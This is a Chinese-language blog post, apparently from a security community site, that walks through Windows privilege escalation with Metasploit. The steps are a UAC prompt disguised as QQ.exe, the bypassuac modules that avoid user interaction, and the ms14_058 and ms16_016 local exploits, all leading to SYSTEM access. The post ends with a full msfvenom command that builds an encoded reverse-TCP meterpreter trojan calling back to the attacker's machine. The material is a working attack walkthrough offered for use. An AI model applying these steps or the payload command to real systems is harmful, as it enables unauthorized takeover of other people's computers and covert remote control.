文章来自【字节脉搏社区】 作者-purplet
UAC提权
当获得一个低权限的sessions时,这里是管理员权限,想进一步提升权限,可以使用UAC的方法,是因为此时无法通过getsystem直接提权
首先background让当前session后台运行 进入下面这个模块 use Exploit/windows/local/ask set session (此时session对应id) set filename QQ.exe(靶机上将要弹出的uac) exploit 此时在靶机上出现一个exe文件可执行请求提醒,当点击是后,kali上会获得一个session
进入这个session
首先输入sessions查看所有获取到的session,然后进入对应会话session,命令是sessions -i (对应id)
执行getuid发现仍是管理员权限,但是不要担心,再次执行getsystem将获得system权限
但是这样的方式并不好,用户很明显可以看到这样的请求,稍微有些意识的用户都会拒绝点击,因此我们可以尝试bypass uac的方式,不与用户直接交互,而metasploit中就正好提供了这样的模块
MSF模块 exploit/windows/local/bypassuac exploit/windows/local/bypassuac_injection exploit/windows/local/bypassuac_vbs 我们这里就用bypassuac模块
只需设置session即可
set session (session为对应低权限的id)
我们也可以看到这个模块可以对32位和64位的电脑都有效
exploit后我们可以收到一个session,再次执行进入,重复上述提权步骤,将得到system权限(这里不放图了),而靶机那边没有任何反应
至此UACbypass提权成功
附加两个本地提权漏洞
利用本地提权漏洞 search ms14_058 use exploit/windows/local/ms14_058_track_popup_menu 设置session即可 exploit后得到session,这里都不用再执行getsystem的命令,直接得到system权限 可在winxp sp3,win2003 sp2,win7 sp1,win8 32位上执行 search ms16_016 use exploit/windows/local/ms16_016_webdav 设置session即可 exploit后得到session,这里都不用再执行getsystem的命令,直接得到system权限 可在win7 sp1上执行
补充上次遇到的问题:可能是生成的木马有问题
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=攻击机ip LPORT=4444 -f exe > ma.exe
用以上命令生成的木马,不会出现上次报错终止的问题